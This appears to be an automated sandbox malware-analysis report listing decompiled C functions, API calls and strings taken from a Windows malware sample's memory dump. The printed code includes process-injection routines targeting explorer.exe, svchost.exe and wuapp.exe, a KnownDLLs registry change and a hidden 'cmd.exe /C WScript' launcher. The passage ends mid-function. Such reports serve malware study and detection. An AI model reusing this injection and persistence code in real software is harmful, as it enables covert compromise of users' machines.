Opcode ID: 9a135f9221decc7cf510ff1d72d7244927fac3eabd8b063ec514c09c422b9c30
Instruction ID: afa3d8fde35025610b1738ba6b06ad62f0ab67338f12e49060e2eddec4225255
Opcode Fuzzy Hash: 9a135f9221decc7cf510ff1d72d7244927fac3eabd8b063ec514c09c422b9c30
Instruction Fuzzy Hash: 6D217C35A00108EBEB216FA5EC09B9E7FA9EF14749F1500A8F905E4164E732AE10AB91

Uniqueness

Uniqueness Score: -1.00%

Function 013C3150, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E013C3150(intOrPtr _a4) {
				short _v524;
				int _t6;
				void* _t16;
				char* _t17;
				char* _t18;

				if( *0x1591314 == 0) {
					if( *0x1591318 == 0) {
						_t17 = L"\\System32\\wuapp.exe";
						_t18 = L"\\System32\\svchost.exe";
					} else {
						goto L4;
					}
				} else {
					if( *0x1591318 != 0) {
						L4:
						_t17 = L"\\SysWOW64\\wuapp.exe";
						_t18 = L"\\SysWOW64\\svchost.exe";
					} else {
						_t17 = L"\\notepad.exe";
						_t18 = L"\\explorer.exe";
					}
				}
				_t6 = GetWindowsDirectoryW( &_v524, 0x104);
				if(_t6 == 0 || _t6 > 0x104) {
					return 0;
				} else {
					_t20 = _a4;
					E013C1A00(_a4,  &_v524);
					E013C1970(_a4, _t17);
					if(E013C7ED0(_t20) != 0) {
						L11:
						return 1;
					} else {
						E013C1A00(_t20,  &_v524);
						E013C1970(_t20, _t18);
						_t16 = E013C7ED0(_t20);
						if(_t16 != 0) {
							goto L11;
						} else {
							return _t16;
						}
					}
				}
			}

0x013c3162
0x013c3180
0x013c318e
0x013c3193
0x00000000
0x00000000
0x00000000
0x013c3164
0x013c316b
0x013c3182
0x013c3182
0x013c3187
0x013c316d
0x013c316d
0x013c3172
0x013c3172
0x013c316b
0x013c31a4
0x013c31ac
0x013c3215
0x013c31b5
0x013c31b6
0x013c31c1
0x013c31c8
0x013c31d8
0x013c3202
0x013c320d
0x013c31da
0x013c31e2
0x013c31e9
0x013c31ef
0x013c31f9
0x00000000
0x013c31fb
0x013c3201
0x013c3201
0x013c31f9
0x013c31d8

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104,73B74D40,00000000), ref: 013C31A4

Strings

\System32\svchost.exe, xrefs: 013C3193
\System32\wuapp.exe, xrefs: 013C318E
\SysWOW64\svchost.exe, xrefs: 013C3187, 013C31E7
\SysWOW64\wuapp.exe, xrefs: 013C3182, 013C31C6
\explorer.exe, xrefs: 013C3172
\notepad.exe, xrefs: 013C316D

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: DirectoryWindows
String ID: \SysWOW64\svchost.exe$\SysWOW64\wuapp.exe$\System32\svchost.exe$\System32\wuapp.exe$\explorer.exe$\notepad.exe
API String ID: 3619848164-3654143111
Opcode ID: b8b71fa42177dacc0a7ef23471d758cac3e779b4c1d33b3ce71123d8f74625d4
Instruction ID: 5914074928e832ae193b76e6b95f90bdea8ab43945639db6086bcf259c8fcd69
Opcode Fuzzy Hash: b8b71fa42177dacc0a7ef23471d758cac3e779b4c1d33b3ce71123d8f74625d4
Instruction Fuzzy Hash: 07117D326003195AEB30611DAC44BEB736CEB41F7CF0601AEED0DC2142D625DE99C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 013C29E0, Relevance: 10.8, APIs: 7, Instructions: 322
threadsleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E013C29E0(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16, DWORD* _a20, intOrPtr _a24) {
				CHAR* _v8;
				CHAR* _v12;
				void* _v16;
				long _v20;
				CHAR* _v24;
				long _v28;
				CHAR* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				long _v44;
				long _v48;
				long _v52;
				char _v56;
				long _v60;
				long _v64;
				long _v68;
				long _v72;
				long _v76;
				char _v80;
				void* _t112;
				void* _t115;
				CHAR* _t118;
				CHAR* _t119;
				CHAR* _t129;
				signed short _t132;
				CHAR* _t134;
				_Unknown_base(*)()* _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				CHAR* _t138;
				CHAR* _t141;
				CHAR* _t142;
				CHAR* _t147;
				void* _t149;
				CHAR* _t150;
				void* _t164;
				CHAR** _t165;
				void* _t168;
				void* _t170;
				struct HINSTANCE__* _t176;
				CHAR* _t177;
				signed int _t178;
				CHAR* _t180;
				signed int _t185;
				CHAR* _t188;
				_Unknown_base(*)()** _t190;
				intOrPtr _t192;
				CHAR* _t193;
				CHAR* _t195;
				intOrPtr* _t196;
				void* _t198;
				signed short* _t199;
				CHAR** _t201;
				char _t202;
				void* _t204;
				void* _t205;
				void* _t208;

				_t186 = _a4;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = 0;
				_v20 = 0;
				_v48 = 0;
				_v44 = 0;
				 *_a20 = 0;
				_t196 =  *0x1591094(_a4);
				_v40 = _t196;
				if( *_t196 != 0x4550) {
					L5:
					return 0;
				} else {
					_v28 =  *((intOrPtr*)(_t196 + 0x50));
					_v56 = _a8;
					_v80 = 0x18;
					_v76 = 0;
					_v68 = 0;
					_v72 = 0;
					_v64 = 0;
					_v60 = 0;
					_v52 = 0;
					_t112 =  *0x1591098( &_v8, 0x1fffff,  &_v80,  &_v56);
					if(_t112 != 0) {
						goto L5;
					} else {
						_t208 =  *0x1591314 - _t112; // 0x1
						if(_t208 == 0) {
							L6:
							_t115 =  *0x15910a8(_v8,  &_v12, 0,  &_v28, 0x3000, 0x40);
							__eflags = _t115;
							if(_t115 != 0) {
								goto L4;
							} else {
								_t170 = VirtualAlloc(_t115, _v28, 0x3000, 0x40);
								__eflags = _t170;
								if(_t170 == 0) {
									L43:
									__eflags = _v12;
									if(_v12 != 0) {
										 *0x15910ac(_v8,  &_v12,  &_v20, 0x8000);
									}
									_t118 = _v8;
									__eflags = _t118;
									if(_t118 != 0) {
										 *0x1591088(_t118);
										_t118 = _v8;
									}
									__eflags = _t170;
									if(_t170 != 0) {
										VirtualFree(_t170, 0, 0x8000);
										_t118 = _v8;
									}
									__eflags = _v24;
									_v20 = 0;
									if(_v24 != 0) {
										 *0x15910ac(_t118,  &_v24,  &_v20, 0x8000);
									}
									_t119 = _v16;
									__eflags = _t119;
									if(_t119 != 0) {
										 *0x1591088(_t119);
									}
									__eflags = 0;
									return 0;
								} else {
									E013C1640(_t170, _t186, _v28);
									_t205 = _t204 + 0xc;
									_t188 =  *((intOrPtr*)(_t196 + 0x80)) + _t170;
									__eflags = _t188;
									while(1) {
										_t129 = _t188[0xc];
										_v32 = _t188;
										__eflags = _t129;
										if(_t129 != 0) {
											goto L11;
										}
										__eflags = _t188[4] - _t129;
										if(_t188[4] == _t129) {
											_t136 = _v40;
											_t177 = _v12;
											_t192 = _a4;
											_t45 = _t136 + 0xa0; // 0x45dd842a
											_t46 = _t136 + 0x34; // 0x0
											_t137 =  *_t46;
											_t201 =  *_t45 + _t170;
											_v40 = _t177 - _t137;
											__eflags =  *_t201;
											_v36 = _t192 - _t137;
											if( *_t201 != 0) {
												do {
													_t193 = _t201[1];
													_t50 =  &(_t201[1]); // 0x45dd842e
													_t165 = _t50;
													_v32 = _t165;
													__eflags = _t193 - 8;
													if(_t193 >= 8) {
														_t185 = 0;
														_t195 =  &(_t193[0xfffffffffffffff8]) >> 1;
														__eflags = _t195;
														if(_t195 != 0) {
															asm("o16 nop [eax+eax]");
															do {
																_t178 =  *(_t201 + 8 + _t185 * 2) & 0x0000ffff;
																__eflags = _t178;
																if(_t178 != 0) {
																	_t180 =  &(( *_t201)[_t178 & 0x00000fff]);
																	_t57 =  &(_t180[_t170]);
																	 *_t57 = _t180[_t170] + _v40 - _v36;
																	__eflags =  *_t57;
																}
																_t185 = _t185 + 1;
																__eflags = _t185 - _t195;
															} while (_t185 < _t195);
															_t165 = _v32;
														}
													}
													_t201 = _t201 +  *_t165;
													__eflags =  *_t201;
												} while ( *_t201 != 0);
												_t177 = _v12;
												_t192 = _a4;
											}
											_t138 =  *0x159109c(_v8, _t177, _t170, _v28, 0);
											__eflags = _t138;
											if(_t138 < 0) {
												goto L43;
											} else {
												_t202 = _a16;
												_t141 =  *0x15910a8(_v8,  &_v24, 0,  &_a16, 0x3000, 4);
												__eflags = _t141;
												if(_t141 != 0) {
													goto L43;
												} else {
													_t142 =  *0x159109c(_v8, _v24, _a12, _t202, _t141);
													__eflags = _t142;
													if(_t142 < 0) {
														goto L43;
													} else {
														_t147 =  *0x15910a0(_v8, 0, 0, 0, 0, 0, _v12 - _t192 + _a24, _v24,  &_v16, 0);
														__eflags = _t147;
														if(_t147 < 0) {
															goto L43;
														} else {
															asm("xorps xmm0, xmm0");
															asm("movlpd [ebp-0x2c], xmm0");
															_t149 =  *0x15910a4(_v16, 0,  &_v48);
															__eflags = _t149 - 0x102;
															if(_t149 == 0x102) {
																while(1) {
																	__eflags =  *0x1592118;
																	if( *0x1592118 != 0) {
																		break;
																	}
																	Sleep(0xbb8);
																	_t164 =  *0x15910a4(_v16, 0,  &_v48);
																	__eflags = _t164 - 0x102;
																	if(_t164 == 0x102) {
																		continue;
																	} else {
																	}
																	goto L41;
																}
																TerminateThread(_v16, 0);
															}
															L41:
															_t150 = GetExitCodeThread(_v16, _a20);
															__eflags = _t150;
															if(_t150 == 0) {
																goto L43;
															} else {
																 *0x1591088(_v16);
																 *0x15910ac(_v8,  &_v12,  &_v20, 0x8000);
																 *0x1591088(_v8);
																VirtualFree(_t170, 0, 0x8000);
																_v20 = 0;
																 *0x15910ac(_v8,  &_v24,  &_v20, 0x8000);
																return 1;
															}
														}
													}
												}
											}
										} else {
											goto L11;
										}
										goto L54;
										L11:
										_t176 = E013C8B00( &(_t129[_t170]));
										_t205 = _t205 + 4;
										_v36 = _t176;
										__eflags = _t176;
										if(_t176 == 0) {
											goto L43;
										} else {
											_t198 = _t170 +  *_t188;
											_t190 = _t170 + _t188[0x10];
											__eflags = _t198 - _t170;
											_t199 =  ==  ? _t190 : _t198;
											__eflags = _t199 - _t170;
											if(_t199 == _t170) {
												goto L43;
											} else {
												_t132 =  *_t199;
												__eflags = _t132;
												if(__eflags == 0) {
													L19:
													_t188 =  &(_v32[0x14]);
													continue;
												} else {
													L14:
													L14:
													if(__eflags >= 0) {
														_t134 = _t132 + 2 + _t170;
														__eflags = _t134;
													} else {
														_t134 = _t132 & 0x0000ffff;
													}
													_t135 = GetProcAddress(_t176, _t134);
													 *_t190 = _t135;
													__eflags = _t135;
													if(_t135 == 0) {
														goto L43;
													}
													_t132 = _t199[2];
													_t199 =  &(_t199[2]);
													_t176 = _v36;
													_t190 = _t190 + 4;
													__eflags = _t132;
													if(__eflags != 0) {
														goto L14;
													} else {
														goto L19;
													}
												}
											}
										}
										goto L54;
									}
								}
							}
						} else {
							_t168 = E013C8270(__ecx, _v8);
							_t204 = _t204 + 4;
							if(_t168 != 0) {
								goto L6;
							} else {
								L4:
								 *0x1591088(_v8);
								goto L5;
							}
						}
					}
				}
				L54:
			}

0x013c29eb
0x013c29ef
0x013c29f6
0x013c29fd
0x013c2a04
0x013c2a0b
0x013c2a12
0x013c2a19
0x013c2a20
0x013c2a27
0x013c2a33
0x013c2a35
0x013c2a3e
0x013c2ab9
0x013c2abf
0x013c2a40
0x013c2a43
0x013c2a49
0x013c2a53
0x013c2a63
0x013c2a6b
0x013c2a72
0x013c2a79
0x013c2a80
0x013c2a87
0x013c2a8e
0x013c2a96
0x00000000
0x013c2a98
0x013c2a98
0x013c2a9e
0x013c2ac0
0x013c2ad4
0x013c2ada
0x013c2adc
0x00000000
0x013c2ade
0x013c2af0
0x013c2af2
0x013c2af4
0x013c2d49
0x013c2d49
0x013c2d4d
0x013c2d5f
0x013c2d5f
0x013c2d65
0x013c2d68
0x013c2d6a
0x013c2d6d
0x013c2d73
0x013c2d73
0x013c2d76
0x013c2d78
0x013c2d82
0x013c2d88
0x013c2d88
0x013c2d8b
0x013c2d8f
0x013c2d96
0x013c2da6
0x013c2da6
0x013c2dac
0x013c2daf
0x013c2db1
0x013c2db4
0x013c2db4
0x013c2dbc
0x013c2dc2
0x013c2afa
0x013c2aff
0x013c2b0a
0x013c2b0d
0x013c2b0d
0x013c2b0f
0x013c2b0f
0x013c2b12
0x013c2b15
0x013c2b17
0x00000000
0x00000000
0x013c2b19
0x013c2b1c
0x013c2b88
0x013c2b8b
0x013c2b90
0x013c2b93
0x013c2b99
0x013c2b99
0x013c2b9c
0x013c2ba0
0x013c2ba7
0x013c2baa
0x013c2bad
0x013c2bb0
0x013c2bb0
0x013c2bb3
0x013c2bb3
0x013c2bb6
0x013c2bb9
0x013c2bbc
0x013c2bc1
0x013c2bc6
0x013c2bc6
0x013c2bc8
0x013c2bca
0x013c2bd0
0x013c2bd0
0x013c2bd5
0x013c2bd8
0x013c2be3
0x013c2be8
0x013c2be8
0x013c2be8
0x013c2be8
0x013c2beb
0x013c2bec
0x013c2bec
0x013c2bf0
0x013c2bf0
0x013c2bc8
0x013c2bf3
0x013c2bf5
0x013c2bf5
0x013c2bfa
0x013c2bfd
0x013c2bfd
0x013c2c0a
0x013c2c10
0x013c2c12
0x00000000
0x013c2c18
0x013c2c18
0x013c2c2f
0x013c2c35
0x013c2c37
0x00000000
0x013c2c3d
0x013c2c48
0x013c2c4e
0x013c2c50
0x00000000
0x013c2c56
0x013c2c75
0x013c2c7b
0x013c2c7d
0x00000000
0x013c2c83
0x013c2c86
0x013c2c8f
0x013c2c94
0x013c2c9a
0x013c2c9f
0x013c2ca7
0x013c2cac
0x013c2cae
0x00000000
0x00000000
0x013c2cb5
0x013c2cc0
0x013c2cc6
0x013c2ccb
0x00000000
0x00000000
0x013c2ccd
0x00000000
0x013c2ccb
0x013c2cd4
0x013c2cd4
0x013c2cda
0x013c2ce0
0x013c2ce6
0x013c2ce8
0x00000000
0x013c2cea
0x013c2ced
0x013c2d03
0x013c2d0c
0x013c2d1a
0x013c2d28
0x013c2d37
0x013c2d48
0x013c2d48
0x013c2ce8
0x013c2c7d
0x013c2c50
0x013c2c37
0x00000000
0x00000000
0x00000000
0x00000000
0x013c2b1e
0x013c2b26
0x013c2b28
0x013c2b2b
0x013c2b2e
0x013c2b30
0x00000000
0x013c2b36
0x013c2b3b
0x013c2b3d
0x013c2b3f
0x013c2b41
0x013c2b44
0x013c2b46
0x00000000
0x013c2b4c
0x013c2b4c
0x013c2b4e
0x013c2b50
0x013c2b80
0x013c2b83
0x00000000
0x013c2b52
0x00000000
0x013c2b52
0x013c2b52
0x013c2b5c
0x013c2b5c
0x013c2b54
0x013c2b54
0x013c2b54
0x013c2b60
0x013c2b66
0x013c2b68
0x013c2b6a
0x00000000
0x00000000
0x013c2b70
0x013c2b73
0x013c2b76
0x013c2b79
0x013c2b7c
0x013c2b7e
0x00000000
0x00000000
0x00000000
0x00000000
0x013c2b7e
0x013c2b50
0x013c2b46
0x00000000
0x013c2b30
0x013c2b0f
0x013c2af4
0x013c2aa0
0x013c2aa3
0x013c2aa8
0x013c2aad
0x00000000
0x013c2aaf
0x013c2aaf
0x013c2ab2
0x00000000
0x013c2ab2
0x013c2aad
0x013c2a9e
0x013c2a96
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 013C2AEA
GetProcAddress.KERNEL32(00000000,-00000002), ref: 013C2B60
Sleep.KERNEL32(00000BB8), ref: 013C2CB5
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 013C2CE0

Part of subcall function 013C8270: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,013C3432), ref: 013C8285
Part of subcall function 013C8270: GetProcAddress.KERNEL32(00000000,?,?,013C3432), ref: 013C828C

TerminateThread.KERNEL32(00000000,00000000), ref: 013C2CD4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013C2D1A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013C2D82

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Virtual$AddressFreeProcThread$AllocCodeExitHandleModuleSleepTerminate
String ID:
API String ID: 844144628-0
Opcode ID: ff44df71987cb6535de25acd5e3dc671cc69ae5b5155d29f2d2f3c1ecf86ea53
Instruction ID: 3f7b99ae4e87ed1918ef33bcaa0d935c2580587ba31c8e0223c0f086a6655b34
Opcode Fuzzy Hash: ff44df71987cb6535de25acd5e3dc671cc69ae5b5155d29f2d2f3c1ecf86ea53
Instruction Fuzzy Hash: 89C16D71A00219EFEF20CF98CC89BEEBBB9FF04714F154069E915A7240D771AA44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013C37E0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 013C7ED0: GetFileAttributesW.KERNEL32(?,?,013C31D3,013C47C4,013C47C4,\System32\wuapp.exe,013C47C4,?,00000000), ref: 013C7ED6

GetFileSizeEx.KERNEL32(00000000,00000000), ref: 013C38CD
VirtualAlloc.KERNEL32(00000000,00000CC8,00003000,00000004), ref: 013C3900
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013C3942
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013C3986

Strings

0125789244697858, xrefs: 013C3971
@, xrefs: 013C3899

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Virtual$FileFree$AllocAttributesSize
String ID: 0125789244697858$@
API String ID: 1658238082-3353267005
Opcode ID: 3588b3eca8fc120e7a220c87b40477a6b21f5229d2fa19de63a800e272cc9ac5
Instruction ID: 5ebe77b928e492044fb13973cbeda08fd84870efd4260e6d2a2f0fa9084255d7
Opcode Fuzzy Hash: 3588b3eca8fc120e7a220c87b40477a6b21f5229d2fa19de63a800e272cc9ac5
Instruction Fuzzy Hash: 46416F70E40319BBFB20DF94DD49BDEBBB8BB04B19F104159F609B91C0D7B55A088BA5

Uniqueness

Uniqueness Score: -1.00%

Function 013C8450, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100
sleepthreadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E013C8450(char* __ecx, void* __eflags) {
				char _v8;
				char _v1032;
				char _v1036;
				long _v1040;
				char _v5136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t24;
				void* _t34;
				void* _t35;
				intOrPtr _t39;
				signed int _t41;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t47;

				_t37 = __ecx;
				E013C1BB0( &_v5136, 0, 0x1000);
				E013C1BB0( &_v1036, 0, 0x404);
				E013C1670( &_v1036, 0, 0x404);
				_v1036 = GetCurrentProcessId();
				E013C1A00( &_v1032, "C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe");
				_t46 = _t44 + 0x2c;
				_push(_t35);
				_push(_t41);
				_push(_t39);
				L1:
				while(1) {
					if( *0x1591314 == 0) {
						_t24 = E013C7EF0("explorer.exe");
						_t47 = _t46 + 4;
						if(_t24 != 0) {
							_t37 =  &_v1036;
							E013C29E0( &_v1036, 0x13c0000, _t24,  &_v1036, 0x404,  &_v8, E013C8390);
							_t46 = _t47 + 0x18;
							goto L12;
						}
					} else {
						_v1040 = 0;
						_t35 = E013C80E0(_t35, _t39, _t41, 1,  &_v5136, 0x1000);
						_t46 = _t46 + 0xc;
						if(_t35 != 0) {
							_t41 = 0;
							if(_t35 != 0) {
								while( *0x1592118 == 0) {
									_t39 =  *((intOrPtr*)(_t43 + _t41 * 4 - 0x140c));
									if(_t39 == 0 || _t39 == GetCurrentProcessId()) {
										L8:
										_t41 = _t41 + 1;
										if(_t41 < _t35) {
											continue;
										} else {
										}
									} else {
										_t34 = E013C29E0(_t37, 0x13c0000, _t39,  &_v1036, 0x404,  &_v8, E013C8390);
										_t46 = _t46 + 0x18;
										if(_t34 == 0) {
											goto L8;
										}
									}
									goto L12;
								}
							}
							L12:
							if( *0x1592118 != 0) {
								ExitThread(0);
							}
							Sleep(0x1f4);
							continue;
						}
					}
					return 0;
				}
			}

0x013c8450
0x013c8467
0x013c847a
0x013c848d
0x013c849b
0x013c84ad
0x013c84b2
0x013c84b5
0x013c84b6
0x013c84b7
0x00000000
0x013c84c0
0x013c84c7
0x013c8552
0x013c8557
0x013c855c
0x013c856c
0x013c8579
0x013c857e
0x00000000
0x013c857e
0x013c84cd
0x013c84d8
0x013c84ea
0x013c84ec
0x013c84f1
0x013c84f7
0x013c84fb
0x013c8501
0x013c850a
0x013c8513
0x013c8546
0x013c8546
0x013c8549
0x00000000
0x00000000
0x013c854b
0x013c851f
0x013c853a
0x013c853f
0x013c8544
0x00000000
0x00000000
0x013c8544
0x00000000
0x013c8513
0x013c8501
0x013c8581
0x013c8588
0x013c859c
0x013c859c
0x013c858f
0x00000000
0x013c858f
0x013c84f1
0x013c85aa
0x013c85aa

APIs

GetCurrentProcessId.KERNEL32 ref: 013C8495
GetCurrentProcessId.KERNEL32 ref: 013C8515
Sleep.KERNEL32(000001F4), ref: 013C858F
ExitThread.KERNEL32 ref: 013C859C

Strings

explorer.exe, xrefs: 013C854D
C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe, xrefs: 013C84A7

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$ExitSleepThread
String ID: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe$explorer.exe
API String ID: 970816010-2632522001
Opcode ID: 0fea6a9d684c5965a507bd7b7c18dbec8ab5b64faae105a0b0288173cc013b5f
Instruction ID: 204e447a5e5d444f13be3f96f34eac5c0121a8db6c0bc93deb430804e13ffe53
Opcode Fuzzy Hash: 0fea6a9d684c5965a507bd7b7c18dbec8ab5b64faae105a0b0288173cc013b5f
Instruction Fuzzy Hash: 113163F6940214EAE720AA559C42FE6376C5710F4DF0400ECFF04B2086EBB09F498BB5

Uniqueness

Uniqueness Score: -1.00%

Function 013C6CA0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E013C6CA0(intOrPtr _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v1128;
				long _t25;

				E013C1BB0( &_v88, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x10], xmm0");
				E013C1A00( &_v1128, L"cmd.exe /C WScript \"");
				E013C1970( &_v1128, _a4 - 0xffffff80);
				E013C1970( &_v1128, "\"");
				_t25 = CreateProcessW(0,  &_v1128, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				if(_t25 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					ExitThread(_v20.dwProcessId);
				}
				ExitThread(_t25);
			}

0x013c6cb1
0x013c6cbc
0x013c6cc5
0x013c6cc9
0x013c6cdc
0x013c6ced
0x013c6d15
0x013c6d1d
0x013c6d29
0x013c6d32
0x013c6d3b
0x013c6d3b
0x013c6d20

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 013C6D15
ExitThread.KERNEL32 ref: 013C6D20
CloseHandle.KERNEL32(?), ref: 013C6D29
CloseHandle.KERNEL32(?), ref: 013C6D32
ExitThread.KERNEL32 ref: 013C6D3B

Strings

cmd.exe /C WScript ", xrefs: 013C6CBF

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: CloseExitHandleThread$CreateProcess
String ID: cmd.exe /C WScript "
API String ID: 3397019416-3599441821
Opcode ID: e40e5fe6df8007509a35cd2ad61f10a5d6bd6b2e7904948a0904dcc617a98adc
Instruction ID: 316eb800d16ecdcb584c5595dce1da98bdb5ed0f7d3720c218e2a12f29121ade
Opcode Fuzzy Hash: e40e5fe6df8007509a35cd2ad61f10a5d6bd6b2e7904948a0904dcc617a98adc
Instruction Fuzzy Hash: 62115BB194021DBEDB20ABE5CD4AF9E777CAF15B08F100258F205A6081EB71AA448B99

Uniqueness

Uniqueness Score: -1.00%

Function 013C2DD0, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013C2DD0(void* __ecx) {
				void* _v8;
				long _t8;

				_v8 = 0;
				_t8 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, 0xf003f,  &_v8);
				if(_t8 == 0) {
					RegSetValueExW(_v8, L"ntdll", 0, 1, L"ntdll.dll", 2 + E013C1B40(L"ntdll.dll") * 2);
					return RegCloseKey(_v8);
				}
				return _t8;
			}

0x013c2dd7
0x013c2df0
0x013c2df8
0x013c2e20
0x00000000
0x013c2e29
0x013c2e32

APIs

RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs,00000000,000F003F,013C2F21), ref: 013C2DF0
RegSetValueExW.ADVAPI32(00000000,ntdll,00000000,00000001,ntdll.dll,00000000), ref: 013C2E20
RegCloseKey.ADVAPI32(00000000), ref: 013C2E29

Strings

ntdll, xrefs: 013C2E18
ntdll.dll, xrefs: 013C2DFA, 013C2E0F
SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs, xrefs: 013C2DE6

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: CloseOpenValue
String ID: SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs$ntdll$ntdll.dll
API String ID: 779948276-834112533
Opcode ID: b5d8d4d6d4f0fcd16b0d29077ad35838b3de1e7a7603185af75678ecd6ca4675
Instruction ID: 832f0c0f71f395d9d47982b7def151384708c404dfa70852ec0a9dfed916722d
Opcode Fuzzy Hash: b5d8d4d6d4f0fcd16b0d29077ad35838b3de1e7a7603185af75678ecd6ca4675
Instruction Fuzzy Hash: 59F0A070680208FBEB209B91DC07FA9767CE754F0CF12009CFA05B1251E6B17E10DB44

Uniqueness

Uniqueness Score: -1.00%

Function 013C4DE0, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 152
sleepCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E013C4DE0(short __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v1784;
				intOrPtr _v1788;
				char _v1792;
				intOrPtr _v1796;
				char _v2052;
				intOrPtr _v2056;
				char _v2568;
				char _v3080;
				intOrPtr _v3084;
				char _v3148;
				char _v3276;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				char _t52;
				char _t62;
				void* _t76;
				short _t79;
				void* _t84;
				intOrPtr _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t92;
				void* _t93;

				_t93 = __eflags;
				_t80 = __edx;
				_t79 = __ecx;
				E013C1670( &_v3276, 0, 0xcc8);
				_t41 =  *0x1591bb4; // 0x1e
				_t81 = _a4;
				_v2056 = _t41;
				_t42 =  *0x1591bbc; // 0xa
				_v1796 = _t42;
				_t43 =  *0x1591c24; // 0x0
				_v1788 = _t43;
				_t84 = E013C4B00(_t79, __edx, _t93, _a4);
				_t87 = _t86 + 0x10;
				_t94 = _t84;
				if(_t84 != 0) {
					L5:
					_t46 = E013C28F0(_t84, E013C5000,  &_v3276);
					_t88 = _t87 + 0xc;
					_push(_t84);
					if(_t46 >= 0) {
						E013C1510();
						_t85 = _a12;
						_t89 = _t88 + 4;
						__eflags = _v2052;
						if(_v2052 != 0) {
							E013C17E0(_t85 + 0x4c8,  &_v2052);
							_t89 = _t89 + 8;
						}
						__eflags = _v3276;
						if(_v3276 != 0) {
							E013C17E0(_t85,  &_v3276);
							_t89 = _t89 + 8;
						}
						__eflags = _v3148;
						if(_v3148 != 0) {
							E013C17E0(_t85 + 0x80,  &_v3148);
							_t89 = _t89 + 8;
						}
						__eflags = _v3080;
						if(_v3080 != 0) {
							_t82 = _t85 + 0xc4;
							E013C17E0(_t85 + 0xc4,  &_v3080);
							_t89 = _t89 + 8;
							__eflags = _v1784;
							if(_v1784 != 0) {
								__eflags =  *0x1591c28;
								if( *0x1591c28 != 0) {
									_t62 = E013C1740("d572da9202196121d952231f26d65d07",  &_v1784);
									_t89 = _t89 + 8;
									__eflags = _t62;
									if(_t62 != 0) {
										E013C76A0(_t79, _t80, _t82, _a16, _a20,  &_v1784);
										_t89 = _t89 + 0x10;
									}
								}
							}
						}
						__eflags = _v2568;
						if(_v2568 != 0) {
							E013C17E0(_t85 + 0x2c4,  &_v2568);
							_t89 = _t89 + 8;
						}
						 *((intOrPtr*)(_t85 + 0xc0)) = _v3084;
						 *((intOrPtr*)(_t85 + 0x4c4)) = _v2056;
						 *((intOrPtr*)(_t85 + 0x5c8)) = _v1796;
						 *((intOrPtr*)(_t85 + 0x5d0)) = _v1788;
						_t52 = _v1792;
						 *((intOrPtr*)(_t85 + 0x5cc)) = _t52;
						__eflags = _t52;
						if(_t52 != 0) {
							E013C17E0(_t85 + 0x4c8, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						}
						return 1;
					} else {
						E013C1510();
						goto L7;
					}
				} else {
					Sleep(0x2710);
					_t84 = E013C4B00(_t79, _t80, _t94, _t81);
